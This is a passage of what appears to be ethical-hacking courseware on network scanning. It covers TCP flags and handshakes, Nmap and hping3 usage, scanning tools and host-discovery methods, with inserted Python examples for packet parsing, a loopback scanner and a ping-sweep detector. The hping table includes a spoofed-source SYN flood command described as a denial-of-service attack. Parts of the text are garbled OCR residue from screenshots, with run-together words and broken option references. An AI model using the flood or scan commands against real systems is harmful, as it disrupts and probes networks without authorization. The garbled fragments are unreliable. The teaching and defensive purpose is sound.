- Finish or "FIN": It is set to "1" to announce that no more transmissions will be sent to the remote system and that the connection established by the SYN flag is terminated.
- Reset or "RST": When there is an error in the current connection, this flag is set to "1" and the connection is aborted in response to the error. Attackers use this flag to scan hosts and identify open ports.

SYN scanning mainly deals with three flags: SYN, ACK, and RST. You can use these three flags for gathering illegal information from servers during enumeration.
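As an added example that is not part of the courseware, the following Python builds a 20-byte TCP header with a chosen set of flags and decodes the flag bits back out of the 13th and 14th header bytes, which is exactly what a scanner or packet dissector does when it reads a reply. Only the standard library is used; the ports and sequence numbers in the usage line are arbitrary values chosen for the demonstration.

```python
"""Added example (not the courseware's code): build a minimal TCP header and
decode its control flags with only the standard library."""
import struct

# Bit positions inside the 16-bit "data offset / reserved / flags" word.
# The six flags described in the text occupy the low six bits; CWR and ECE
# (RFC 3168) sit just above them and are listed only so a capture that sets
# them is decoded rather than silently dropped.
TCP_FLAGS = {
    "FIN": 0x01,
    "SYN": 0x02,
    "RST": 0x04,
    "PSH": 0x08,
    "ACK": 0x10,
    "URG": 0x20,
    "ECE": 0x40,
    "CWR": 0x80,
}


def flags_to_bits(names):
    """Combine flag names such as ["SYN", "ACK"] into the flag bit field."""
    bits = 0
    for name in names:
        bits |= TCP_FLAGS[name.upper()]
    return bits


def build_tcp_header(src_port, dst_port, seq, ack, names, window=65535):
    """Return a 20-byte TCP header (no options) with the given flags set.
    The checksum field is left at zero: computing it needs the IP
    pseudo-header and is irrelevant to flag decoding."""
    data_offset_words = 5                       # 5 * 4 = 20 bytes, no options
    offset_and_flags = (data_offset_words << 12) | flags_to_bits(names)
    return struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack,
                       offset_and_flags, window, 0, 0)


def data_offset_bytes(header):
    """Header length in bytes, taken from the high 4 bits of byte 12."""
    return (header[12] >> 4) * 4


def parse_tcp_flags(header):
    """Decode the flags set in a raw TCP header; returns a sorted name list."""
    if len(header) < 20:
        raise ValueError("TCP header must be at least 20 bytes")
    offset_and_flags = struct.unpack("!H", header[12:14])[0]
    bits = offset_and_flags & 0x00FF            # low byte holds the 8 flag bits
    return sorted(name for name, bit in TCP_FLAGS.items() if bits & bit)


if __name__ == "__main__":
    # A SYN probe from an arbitrary high port to port 80, then the SYN/ACK
    # an open port would answer with.
    probe = build_tcp_header(40000, 80, 1000, 0, ["SYN"])
    reply = build_tcp_header(80, 40000, 5000, 1001, ["SYN", "ACK"])
    print(parse_tcp_flags(probe), parse_tcp_flags(reply), data_offset_bytes(reply))
```

The parser masks the low byte only, so the NS bit (RFC 3540, now historic) in bit 8 is ignored; if you are dissecting captures from a stack that sets it, widen the mask to 0x01FF and add a name for it.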

TCP/IP Communication
TCP is connection oriented, i.e., it prioritizes connection establishment before data transfer between applications. This connection between protocols is possible through the three-way handshake.

A TCP session initiates using a three-way handshake mechanism:
- To launch a TCP connection, the source (10.0.0.2:21) sends a SYN packet to the destination (10.0.0.3:21).
- On receiving the SYN packet, the destination responds by sending a SYN/ACK packet back to the source. The ACK part confirms the arrival of the first SYN packet to the source.
- Finally, the source sends an ACK packet for the SYN/ACK packet transmitted by the destination.
- This triggers an "OPEN" connection, thereby allowing communication between the source and destination, which continues until one of them issues a "FIN" or "RST" packet to close the connection.

Figure 3.4: TCP session establishment

The TCP protocol maintains stateful connections for all connection-oriented protocols throughout the Internet and works similarly to ordinary telephone communication, in which one picks up a telephone receiver, hears a dial tone, and dials a number that triggers ringing at the other end until someone picks up the receiver and says, "Hello."

The system terminates the established TCP session as follows:
Thesystemterminates theestablished TCPsessionas follows:
After completing allthedatatransfersthrough theestablished TCPconnection, thesendersends
the connection termination request to the receiver through a FIN or RSTpacket. Upon receiving
the connection termination request, the receiver acknowledges the termination requestby
sending a n ACK packet to the senderandfinally sendsits own FIN packet. Then, the system
terminates the established connection.

Figure 3.5: TCP session termination

Module Flow

Scanning Tools
Scanning Tools
Scanning tools are used to scan and identify live hosts, open ports, running services on a target network, location info, NetBIOS info, and information about all TCP/IP and UDP open ports. The information obtained from these tools will help an ethical hacker in creating the profile of the target organization and scanning the network for open ports of the devices connected.

- Nmap

Source:https://nmap.org
Nmap ("Network Mapper") is a security scanner for network exploration and hacking. It allows you to discover hosts, ports, and services on a computer network, thus creating a "map" of the network. It sends specially crafted packets to the target host and then analyzes the responses to accomplish its goal. It scans vast networks of literally hundreds of thousands of machines. Nmap includes many mechanisms for port scanning (TCP and UDP), OS detection, version detection, ping sweeps, and so on.

Either a network administrator or an attacker can use this tool for their specific needs. Network administrators can use Nmap for network inventory, managing service upgrade schedules, and monitoring host or service uptime. Attackers use Nmap to extract information such as live hosts on the network, open ports, services (application name and version), type of packet filters/firewalls, MAC details, and OSs along with their versions.
Syntax:
# nmap <options> <Target IP address>
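As an added example that is not Nmap's own code, the Python below is a minimal TCP connect() port scanner in the spirit of `nmap -sT`: it completes the full handshake on each port and maps the outcome to Nmap's open/closed/filtered vocabulary. It is exercised against a listener the script itself starts on the loopback interface, so it runs offline and touches no third-party host; the host address, timeout, and thread count are values chosen for the example.

```python
"""Added example (not Nmap's code): a connect()-based TCP port scanner checked
against a loopback listener that the script starts itself."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def start_listener(host="127.0.0.1"):
    """Bind an ephemeral loopback port and accept connections in a daemon thread.
    Returns (listening_socket, port); close the socket to stop the thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(16)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener was closed: stop serving
                return
            conn.close()             # accept and drop, like an idle service

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def unused_port(host="127.0.0.1"):
    """Reserve and immediately release an ephemeral port to get a known-closed one."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def probe(host, port, timeout=0.5):
    """One connect() scan probe. A completed handshake means open; an
    immediate RST (connection refused) means closed; silence until the
    timeout is reported as filtered, as Nmap does."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except (socket.timeout, OSError):
            return "filtered"


def scan(host, ports, workers=32, timeout=0.5):
    """Scan `ports` concurrently; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return dict(zip(ports, states))


def open_ports(host, ports, **kw):
    """Convenience wrapper returning only the open ports, sorted."""
    return sorted(p for p, st in scan(host, ports, **kw).items() if st == "open")


if __name__ == "__main__":
    srv, live = start_listener()
    closed = unused_port()
    print(scan("127.0.0.1", [live, closed]))
    srv.close()
```

A connect() scan is the noisiest option: every open port sees a completed connection and an application-level log entry, whereas Nmap's default SYN scan never sends the final ACK and therefore needs raw-socket privileges.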

Figure 3.6: Screenshot displaying Nmap scan


Obtains
list|S
-
of a
somncague)
3s

(oorkgrovp!
ports,OS
‘open

details, MAC
and
details,
+ lerosatt HITPWPE ht

services
along
with their Minoo
oe
versions resort
Windows RAC

Hping2/Hping3-
37: Screenshot
Figure
sispayingNmap
scan result

Source: http://www.hping.org

Hping2/Hping3 is a command-line-oriented network scanning and packet crafting tool for the TCP/IP protocol that sends ICMP echo requests and supports TCP, UDP, ICMP, and raw-IP protocols. It performs network security auditing, firewall testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting, remote uptime guessing, TCP/IP stack auditing, and other functions. It can send custom TCP/IP packets and display target replies similarly to a ping program with ICMP replies. It handles fragmentation as well as arbitrary packet body and size, and it can be used to transfer encapsulated files under the supported protocols. It also supports idle host scanning. IP spoofing and network/host scanning can be used to perform an anonymous probe for services. Hping2/Hping3 also has a Traceroute mode, which enables attackers to send files between covert channels. It also determines whether the host is up even when the host blocks ICMP packets. Its firewalk-like usage allows the discovery of open ports behind firewalls. It performs manual path MTU discovery and enables attackers to perform remote OS fingerprinting.

Using Hping, an attacker can study the behavior of an idle host and gain information about the target, such as the services that the host offers, the ports supporting the services, and the OS of the target. This type of scan is a predecessor to either heavier probing or outright attacks.

Syntax: # hping <options> <Target IP address>


ICMP Scanning

A ping sweep or Internet Control Message Protocol (ICMP) scanning is a process of sending an ICMP request or ping to all the hosts on the network to determine the ones that are up.

Figure 3.8: ICMP scanning (hping3 -1 output: 9 ICMP echo requests, 9 replies, round-trip min/avg/max 2.2/5.2/9.1 ms)

The OS, router, switch, and IP-based devices use this protocol via the ping command for echo request and echo response as a connectivity tester between different hosts.
ACK Scanning on Port 80

This scanning technique can be used to probe the existence of a firewall and its rule sets. Simple packet filtering allows the establishment of a connection (packets with the ACK bit set), whereas a sophisticated stateful firewall does not allow the establishment of a connection. Note that a bare ACK probe cannot tell an open port from a closed one: an unfiltered port answers with RST whether or not a service is listening, so the only results are "filtered" (no answer or an ICMP unreachable error) and "unfiltered" (RST).

Figure 3.9: ACK scanning on port 80 with hping3 -A 10.10.10.10 -p 80 (each of the 9 replies comes from sport=80 with the RST flag set; round-trip min/avg/max 2.0/5.1/8.4 ms)

The various Hping commands are as follows:

- ICMP ping
  Ex. hping3 -1 10.0.0.25
  Hping performs an ICMP ping scan by specifying the argument -1 in the command line. You may use either --icmp or -1 as the argument in the command line. By issuing the above command, Hping sends an ICMP echo request to 10.0.0.25 and receives an ICMP reply similarly to a ping utility.

- ACK scan on port 80
  Ex. hping3 -A 10.0.0.25 -p 80
  Hping can be configured to perform an ACK scan by specifying the argument -A in the command line. Here, you set the ACK flag in the probe packets and perform the scan. You perform this scan when a host does not respond to a ping request. By issuing this command, Hping checks if a host is alive on a network. If the host is alive and the port is unfiltered, the host returns an RST response regardless of whether the port is open or closed; no response means the probe was filtered.

- UDP scan on port 80
  Ex. hping3 -2 10.0.0.25 -p 80
  Hping uses TCP as its default protocol. Using the argument -2 in the command line specifies that Hping operates in the UDP mode. You may use either --udp or -2 as the argument in the command line.

  By issuing the above command, Hping sends UDP packets to port 80 on the host (10.0.0.25). It returns an ICMP port unreachable message if it finds the port closed and does not return a message if the port is open (or if the probe is filtered, which is why UDP results are often ambiguous).

- Collecting Initial Sequence Number
  Ex. hping3 192.168.1.103 -Q -p 139 -s
  Using the argument -Q in the command line, Hping collects all the TCP sequence numbers generated by the target host (192.168.1.103).

- Firewalls and Timestamps
  Ex. hping3 -S 72.14.207.99 -p 80 --tcp-timestamp
  Many firewalls drop those TCP packets that do not have the TCP Timestamp option set. By adding the --tcp-timestamp argument in the command line, you can enable the TCP timestamp option in Hping and try to guess the timestamp update frequency and uptime of the target host (72.14.207.99).

- SYN scan on port 50-60
  Ex. hping3 -8 50-60 -S 10.0.0.25 -v
  Using the argument -8 or --scan in the command line, you are operating Hping in the scan mode to scan a range of ports on the target host. Adding the argument -S allows you to perform a SYN scan. Therefore, the above command performs a SYN scan on ports 50-60 on the target host.

- FIN, PUSH and URG scan on port 80
  Ex. hping3 -F -P -U 10.0.0.25 -p 80
  By adding the arguments -F, -P, and -U in the command line, you are setting the FIN, PUSH, and URG flags in the probe packets. By issuing this command, you are performing FIN, PUSH, and URG scans on port 80 on the target host (10.0.0.25). If port 80 is open, you will not receive a response. If the port is closed, Hping will return an RST response. This only holds for stacks that follow RFC 793; Microsoft Windows, for example, answers such probes with RST whether the port is open or closed, so the absence of a reply is only "open or filtered."

- Scan entire subnet for live host
  Ex. hping3 -1 10.0.1.x --rand-dest -I eth0
  By issuing this command, Hping performs an ICMP ping scan on the entire subnet 10.0.1.x; in other words, it sends an ICMP echo request randomly (--rand-dest) to all the hosts from 10.0.1.0 to 10.0.1.255 that are connected to the interface eth0. Hosts that are up and do not filter ICMP respond with an ICMP echo reply. In this case, you have not set a port; hence, Hping sends packets to port 0 on all IP addresses by default.
- Intercept all traffic containing HTTP signature
  Ex. hping3 -9 HTTP -I eth0
  The argument -9 will set Hping to the listen mode. Hence, by issuing the command -9 HTTP, Hping starts listening on port 0 (of all the devices connected in the network to interface eth0), intercepts all the packets containing the HTTP signature, and dumps the packet's content from the signature end to the packet's end. For example, on issuing the command hping2 -9 HTTP, if Hping reads a packet that contains the data 234-09sd#1k}s45-HTTPhello_world, it will display the result as hello_world.

- SYN flooding a victim
  Ex. hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood
  The attacker employs TCP SYN flooding techniques using spoofed IP addresses to perform a DoS attack.

The following table lists the various scanning methods and their respective Hping commands:
Scan                                              Command
ICMP ping                                         hping3 -1 10.0.0.25
ACK scan on port 80                               hping3 -A 10.0.0.25 -p 80
UDP scan on port 80                               hping3 -2 10.0.0.25 -p 80
Collecting initial sequence number                hping3 192.168.1.103 -Q -p 139 -s
Firewalls and timestamps                          hping3 -S 72.14.207.99 -p 80 --tcp-timestamp
SYN scan on port 50-60                            hping3 -8 50-60 -S 10.0.0.25 -v
FIN, PUSH, and URG scan on port 80                hping3 -F -P -U 10.0.0.25 -p 80
Scan entire subnet for live host                  hping3 -1 10.0.1.x --rand-dest -I eth0
Intercept all traffic containing HTTP signature   hping3 -9 HTTP -I eth0
SYN flooding a victim                             hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood

Table 3.1: Hping commands and their respective functions
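The decision rules behind the probes in the table above, as an added example that is not hping's code or the courseware's: a parser for the reply lines hping3 prints (the `flags=SA` / `flags=RA` form) and a classifier that turns each probe type plus its reply into Nmap's port-state vocabulary (open, closed, filtered, unfiltered, open|filtered). The reply lines in the test are constructed for the example, not captured from a real host, and the ICMP handling assumes the RFC 792 destination-unreachable codes that scanners conventionally treat as firewall-generated.

```python
"""Added example (not hping's or the courseware's code): parse hping3 reply
lines and classify probe results the way a port scanner does."""
import re

# hping3 prints TCP flags as single letters, e.g. flags=SA for SYN/ACK.
HPING_FLAG_LETTERS = {"S": "SYN", "A": "ACK", "R": "RST",
                      "F": "FIN", "P": "PSH", "U": "URG"}

# ICMP type 3 codes conventionally read as "a filter blocked the probe":
# net/host/port/net-admin/host-admin/comm-admin unreachable.
ICMP_UNREACHABLE_CODES = {1, 2, 3, 9, 10, 13}


def parse_hping_line(line):
    """Turn 'len=46 ip=10.0.0.25 ttl=64 DF id=0 sport=80 flags=SA seq=0 ...'
    into a reply dict with the flag set decoded."""
    fields = dict(re.findall(r"(\w+)=(\S+)", line))
    if "flags" not in fields:
        raise ValueError("not a TCP reply line: " + line)
    return {
        "proto": "tcp",
        "ip": fields.get("ip"),
        "sport": int(fields.get("sport", 0)),
        "flags": {HPING_FLAG_LETTERS[c] for c in fields["flags"]
                  if c in HPING_FLAG_LETTERS},
    }


def icmp(type_, code):
    """Constructed ICMP reply descriptor (no packet bytes involved)."""
    return {"proto": "icmp", "type": type_, "code": code}


def classify(probe, reply):
    """probe: 'syn', 'ack', 'fin' (FIN, PSH, URG style), 'udp' or 'icmp'.
    reply: None for a timeout, a dict from parse_hping_line(), a UDP dict
    {"proto": "udp"}, or an icmp() dict."""
    if probe == "icmp":
        if reply is not None and reply["proto"] == "icmp" and reply["type"] == 0:
            return "host up"
        return "no echo reply"          # down, or ICMP is being filtered
    if reply is not None and reply["proto"] == "icmp":
        if probe == "udp" and reply["type"] == 3 and reply["code"] == 3:
            return "closed"             # port unreachable comes from the stack itself
        if reply["type"] == 3 and reply["code"] in ICMP_UNREACHABLE_CODES:
            return "filtered"
        return "unknown"
    flags = reply["flags"] if reply is not None and reply["proto"] == "tcp" else set()
    if probe == "syn":
        if {"SYN", "ACK"} <= flags:
            return "open"
        if "RST" in flags:
            return "closed"
        return "filtered"
    if probe == "ack":
        # RST proves the probe got through; it never says "open".
        return "unfiltered" if "RST" in flags else "filtered"
    if probe == "fin":
        if "RST" in flags:
            return "closed"
        return "open|filtered"          # silence is ambiguous (RFC 793 stacks only)
    if probe == "udp":
        if reply is not None and reply["proto"] == "udp":
            return "open"
        return "open|filtered"
    raise ValueError("unknown probe type: " + probe)


if __name__ == "__main__":
    # Constructed sample line in hping3's output format.
    line = "len=46 ip=10.0.0.25 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=29200 rtt=0.4 ms"
    print(classify("syn", parse_hping_line(line)))
```

When you drive hping3 from a script, feed its stdout lines through parse_hping_line and keep the probe type you sent alongside each result; the same RST means "closed" after a SYN probe but "unfiltered" after an ACK probe.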

- Metasploit
  Source: https://www.metasploit.com

  Metasploit is an open-source project that provides the infrastructure, content, and tools to perform penetration tests and extensive security auditing. It provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It facilitates the tasks of attackers, exploit writers, and payload writers. A major advantage of the framework is the modular approach, i.e., allowing the combination of any exploit with any payload.

  It enables you to automate the process of discovery and exploitation and provides you with the necessary tools to perform the manual testing phase of a penetration test. You can use Metasploit Pro to scan for open ports and services, exploit vulnerabilities, pivot further into a network, collect evidence, and create a report of the test results.

  Figure 3.10: Screenshot of Metasploit displaying various port scan modules

- NetScanTools Pro
  Source: https://www.netscantools.com

  NetScanTools Pro is an investigation tool that allows you to troubleshoot, monitor, discover, and detect devices on your network. Using this tool, you can easily gather information about the local LAN as well as Internet users, IP addresses, ports, and so on. Attackers can find vulnerabilities and exposed ports in the target system. It helps the attackers to list IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs automatically or manually (using manual tools). NetScanTools Pro combines many network tools and utilities categorized by their functions, such as active, passive, DNS, and local computer.

  Figure 3.11: Screenshot of NetScanTools Pro

Some additional scanning tools are listed below:
- Unicornscan (https://sourceforge.net)
- SolarWinds Port Scanner (https://www.solarwinds.com)
- PRTG Network Monitor (https://www.paessler.com)
- OmniPeek Network Protocol Analyzer (https://www.savvius.com)

Scanning Tools for Mobile

- IP Scanner
  Source: https://10base-t.com

  IP Scanner for iOS scans your local area network to determine the identity of all its active machines and Internet devices. It allows attackers to perform network scanning activities along with ping and port scans.

- Fing
  Source: https://www.fing.io

  Fing is a mobile app for Android and iOS that scans and provides complete network information, such as IP address, MAC address, device vendor, and ISP location. It allows attackers to discover all devices connected to a Wi-Fi network along with their IP and MAC address as well as the name of the vendor/device manufacturer. It also allows attackers to perform network pinging and traceroute activities through specific ports such as SSH, FTP, NetBIOS, etc.

  Figure 3.13: Screenshot of Fing

- Network Scanner
  Source: https://play.google.com

  Network Scanner is an Android mobile application that allows attackers to identify the active hosts in the range of possible addresses in a network. It also displays IP addresses, MAC addresses, host names, and vendor details of all available devices in the network. This tool also allows attackers to port scan targets with specific port numbers.

  Figure 3.14: Screenshot of Network Scanner

Module Flow

Host Discovery

Scanning is the process of gathering information about systems that are "alive" and responding on the network. Host discovery is considered the primary task in the network scanning process. To perform a complete scan and identify open ports and services, it is necessary to check for live systems. Host discovery provides an accurate status of the systems in the network, which enables an attacker to avoid scanning every port on every system in a sea of IP addresses to identify whether the target host is up.

Host discovery is the first step in network scanning. This section highlights how to check for live systems in a network using various ping scan techniques. It also discusses how to ping sweep a network to detect live hosts/systems along with various ping sweep tools.

Host Discovery Techniques

Host discovery techniques can be adopted to discover the active/live hosts in the network. As an ethical hacker, you must be aware of the various types of host discovery techniques. Some host discovery techniques are listed below:
- ARP Ping Scan
- UDP Ping Scan
- ICMP Ping Scan
  - ICMP ECHO Ping
  - ICMP ECHO Ping Sweep
  - ICMP Timestamp Ping
  - ICMP Address Mask Ping
- TCP Ping Scan
  - TCP SYN Ping
  - TCP ACK Ping
- IP Protocol Scan

ARP Ping Scan and UDP Ping Scan

ARP Ping Scan

In the ARP ping scan, ARP packets are sent for discovering all active devices in the IPv4 range even though the presence of such devices is hidden by restrictive firewalls. In most networks, many IP addresses are unused at any given time, specifically in the private address ranges of the LAN. Hence, when the attackers try to send IP packets such as an ICMP echo request to the target host, the OS must determine the hardware destination address (ARP) corresponding to the target IP for addressing the ethernet frame correctly. For this purpose, a series of ARP requests are issued. ARP scan is used to show the MAC address of the network interface on the device, and it can also show the MAC addresses of all the devices sharing the same IPv4 address on the LAN. If the host IP with the respective hardware destination address is active, then the ARP response will be generated by the host; otherwise, after a certain number of ping attempts, the original OS gives up on the host. In other words, when attackers send ARP request probes to the target host, if they receive any ARP response, then the host is active. In case the destination host is found to be unresponsive, the source host adds an incomplete entry to the destination IP in its kernel ARP table. Because ARP is not routed, this technique only works against hosts on the attacker's own Ethernet segment; Nmap uses it automatically for local-LAN targets and falls back to ICMP/TCP probes for remote ones.

Attackers use the Nmap tool to perform ARP ping scan for discovering live hosts in the network. In Zenmap, the -PR option is used to perform ARP ping scan.

Note: -sn is the Nmap command to disable the port scan. Since Nmap uses ARP ping scan as the default ping scan, to disable it and perform other desired ping scans, you can use --disable-arp-ping.

Figure 3.15: ARP ping scan (the attacker sends an ARP request probe to the target, which answers with an ARP response if it is live)

Advantages:

- ARP ping scan is considered to be more efficient and accurate than other host discovery techniques
- ARP ping scan automatically handles ARP requests, retransmission, and timeout at its own discretion
- ARP ping scan is useful for system discovery, where you may need to scan large address spaces
- ARP ping scan can display the response time or latency of a device to an ARP packet
Figure 3.16: ARP scan in Zenmap

UDP Ping Scan

UDP ping scan is similar to TCP ping scan; however, in the UDP ping scan, Nmap sends UDP packets to the target host. The default port number used by Nmap for the UDP ping scan is 40,125. This highly uncommon port is used as the default for sending UDP packets to the target. This default port number can be configured using DEFAULT_UDP_PROBE_PORT_SPEC during compile time in Nmap.

Attackers send UDP packets to the target host, and a UDP response means that the target host is active. If the target host is offline or unreachable, various error messages such as host/network unreachable or TTL exceeded could be returned. In Zenmap, the -PU option is used to perform the UDP ping scan.

Figure 3.17: UDP ping scan to determine if the host is active

Figure 3.18: UDP ping scan to determine if the host is inactive
Advantages

- UDP ping scans have the advantage of detecting systems behind firewalls with strict TCP filtering, leaving the UDP traffic forgotten.

Figure 3.19: UDP ping scan in Zenmap

ICMP ECHO Ping Scan

Attackers use the ICMP ping scan to send ICMP packets to the destination system to gather all necessary information about it. This is because ICMP does not include port abstraction, and it is different from port scanning. However, it is useful to determine what hosts in a network are running by pinging them all.

ICMP ECHO ping scan involves sending ICMP ECHO requests to a host. If the host is alive, it will return an ICMP ECHO reply. This scan is useful for locating active devices or determining if ICMP is passing through a firewall.

Figure 3.20: ICMP echo request and echo reply

UNIX/Linux and BSD-based machines use ICMP echo scanning; the TCP/IP stack implementations in these OSs respond to the ICMP echo requests to the broadcast addresses. This technique does not work on Windows-based networks, as their TCP/IP stack implementation does not reply to ICMP probes directed at the broadcast address. Nmap uses the -P option to ICMP scan the target. The user can also increase the number of pings in parallel using the ~ option. It may also be useful to tweak the ping timeout value using the ~ option.

In Zenmap, the -PE option is used to perform the ICMP ECHO ping scan. Active hosts are displayed as "Host is up," as shown in the screenshot.

Figure 3.21: ICMP ECHO ping scan output

ICMP ECHO Ping Sweep

A ping sweep (also known as an ICMP sweep) is a basic network scanning technique that is adopted to determine the range of IP addresses that map to live hosts (computers). Although a single ping will tell the user whether a specified host computer exists on the network, a ping sweep consists of ICMP ECHO requests sent to multiple hosts. If a specified host is active, it will return an ICMP ECHO reply.

Ping sweeps are among the oldest and slowest methods used to scan a network. This utility is distributed across nearly all platforms, and it acts as a roll call for systems; a system that is active on the network answers the ping query that another system sends out.

ICMP echo scanning pings all the machines in the target network to discover live machines. Attackers send ICMP probes to the broadcast or network address, which relays to all the host addresses in the subnet. The live systems will send the ICMP echo reply message to the source of the ICMP echo probe.

Figure 3.22: ICMP ECHO Ping Sweep
To understand pings better, one should be able to understand the TCP/IP packet. When a system pings, it sends a single packet across the network to a specific IP address. This packet contains 64 bytes (56 data bytes and 8 bytes of protocol header information). The sender then waits or listens for a return packet from the target system. If the connections are good and the target computer is "alive," a good return packet is expected. However, this will not be the case if there is a disruption in communication. Pings also detail the time taken for a packet to make a complete trip, called the "round-trip time." They also help in resolving hostnames. In this case, if the packet bounces back when sent to the IP address, but not when sent to the name, then the system is unable to reconcile the name with the specific IP address.

Attackers calculate subnet masks using subnet mask calculators to identify the number of hosts that are present in the subnet. They subsequently use ping sweep to create an inventory of live systems in the subnet.

ICMP ECHO Ping Sweep Using Nmap

Source: https://nmap.org

Nmap helps an attacker to perform a ping sweep that determines live hosts from a range of IP addresses. In Zenmap, the -PE option with a list of IP addresses is used to perform ICMP ECHO ping sweep.
Figure 3.23: Ping Sweep output using Zenmap
Ping Sweep Tools

Ping sweep tools ping an entire range of network IP addresses to identify the live systems. The following are ping sweep tools that enable one to determine live hosts on the target network by sending multiple ICMP ECHO requests to various hosts on the network at a time.

- Angry IP Scanner

  Source: https://www.angryip.org

  Angry IP Scanner is an IP address and port scanner. It can scan IP addresses in any range as well as any of their ports. It pings each IP address to check if it is alive; optionally, it resolves its hostname, determines the MAC address, scans ports, and so on. The amount of data gathered about each host increases with plugins. Angry IP Scanner has additional features, such as NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, and customizable openers. The tool allows the user to save the scanning results to CSV, TXT, XML, or IP-Port list files. To increase the scanning speed, it uses a multithreaded approach: a separate scanning thread is created for each scanned IP address.

Figure 3.24: Screenshot of Angry IP Scanner showing live hosts

Figure 3.25: Screenshot of Angry IP Scanner showing complete details of live hosts
Some additional ping sweep tools that an attacker uses to determine live hosts on the target network are listed below:

- SolarWinds Engineer's Toolset (https://www.solarwinds.com)
- NetScanTools Pro (https://www.netscantools.com)
- Colasoft Ping Tool (https://www.colasoft.com)
- Visual Ping Tester (http://www.pingtester.net)
- OpUtils (https://www.manageengine.com)
Ping Sweep Countermeasures

Some countermeasures for avoiding ping sweep are as follows:

- Configure the firewall to detect and prevent ping sweep attempts instantaneously
- Use intrusion detection systems and intrusion prevention systems such as Snort (https://www.snort.org) to detect and prevent ping sweep attempts
- Carefully evaluate the type of ICMP traffic flowing through the enterprise networks
- Terminate the connection with any host that is performing more than 10 ICMP ECHO requests
- Use DMZ and allow only commands such as ICMP ECHO_REPLY, HOST UNREACHABLE, and TIME EXCEEDED in DMZ zone
- Limit the ICMP traffic with Access Control Lists (ACLs) to your ISP's specific IP addresses
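A detector for the ping sweep described above, written as an added example (it is not courseware code and not a Snort rule). It applies the "more than 10 ICMP ECHO requests" limit from the countermeasures list and also flags the sweep pattern itself, ECHO requests fanned out across many hosts; the log line layout and the distinct-host threshold are assumptions for this example.

```python
"""Ping sweep detector run over constructed ICMP log lines (added example,
not courseware code). A source is flagged when it sends more than 10 ICMP
ECHO requests inside a time window (the limit in the countermeasures list)
or when its ECHO requests spread over many distinct hosts (the sweep shape).
Assumed log layout: 'epoch src dst icmp_type'; MIN_SWEEP_TARGETS is assumed."""
from collections import defaultdict

ECHO_REPLY = 0            # ICMP type 0
ECHO_REQUEST = 8          # ICMP type 8
MAX_ECHO_PER_SOURCE = 10  # limit stated in the countermeasures above
MIN_SWEEP_TARGETS = 5     # assumed: distinct hosts that make a sweep

# Constructed sample: 10.10.10.16 sweeps 10.10.10.5-15, four hosts answer,
# and 10.10.10.20 sends three ordinary pings to a single host.
SAMPLE_LOG = "\n".join(
    ["1560000000 10.10.10.16 10.10.10.%d 8" % i for i in range(5, 16)]
    + ["1560000001 10.10.10.%d 10.10.10.16 0" % i for i in (5, 9, 10, 11)]
    + ["156000000%d 10.10.10.20 10.10.10.10 8" % i for i in (2, 3, 4)]
)


def parse_log(text):
    """Parse 'epoch src dst icmp_type' lines; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[0].isdigit() or not parts[3].isdigit():
            continue
        records.append((int(parts[0]), parts[1], parts[2], int(parts[3])))
    return records


def detect_ping_sweeps(records, window_seconds=60):
    """Return {src: {"echo_requests": n, "targets": k, "reasons": [...]}}
    for every source whose ECHO requests inside some sliding window of
    window_seconds exceed the count limit or reach the distinct-host limit.
    Echo replies are ignored: a host answering pings is not sweeping."""
    by_src = defaultdict(list)
    for ts, src, dst, icmp_type in sorted(records):
        if icmp_type == ECHO_REQUEST:
            by_src[src].append((ts, dst))
    alerts = {}
    for src, requests in by_src.items():
        window, peak_count, peak_targets = [], 0, 0
        for ts, dst in requests:
            window.append((ts, dst))
            while ts - window[0][0] > window_seconds:   # drop expired entries
                window.pop(0)
            peak_count = max(peak_count, len(window))
            peak_targets = max(peak_targets, len({d for _, d in window}))
        reasons = []
        if peak_count > MAX_ECHO_PER_SOURCE:
            reasons.append("%d ICMP ECHO requests within %ds exceeds limit of %d"
                           % (peak_count, window_seconds, MAX_ECHO_PER_SOURCE))
        if peak_targets >= MIN_SWEEP_TARGETS:
            reasons.append("ECHO requests to %d distinct hosts (sweep pattern)"
                           % peak_targets)
        if reasons:
            alerts[src] = {"echo_requests": peak_count,
                           "targets": peak_targets, "reasons": reasons}
    return alerts


def acl_entries(alerts):
    """Render alerts as deny entries in a generic ACL-style notation (a
    constructed format, not a specific vendor syntax), matching the
    'limit ICMP traffic with ACLs' countermeasure."""
    return ["deny icmp host %s any echo" % src for src in sorted(alerts)]


if __name__ == "__main__":
    found = detect_ping_sweeps(parse_log(SAMPLE_LOG))
    for src, info in found.items():
        print(src, info["reasons"])
    print("\n".join(acl_entries(found)))
```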

Other Host Discovery Techniques

ICMP Timestamp Ping Scan

Besides the traditional ICMP ECHO ping, there are some other types of ICMP pinging techniques such as ICMP timestamp ping scan and ICMP address mask ping scan, which an attacker can adopt in specific conditions.

ICMP timestamp ping is an optional and additional type of ICMP ping whereby the attackers query a timestamp message to acquire the information related to the current time from the target host machine. The target machine responds with a timestamp reply to each timestamp query that is received. However, the response from the destination host is conditional, and it may or may not respond with the time value depending on its configuration by the administrator at the target's end. This timestamp pinging is generally used specifically for time synchronization. Such a ping method is effective in identifying whether the destination host machine is active, specifically in the condition where the administrator blocks the traditional ICMP ECHO ping requests. In Zenmap, the -PP option is used to perform an ICMP timestamp ping scan.

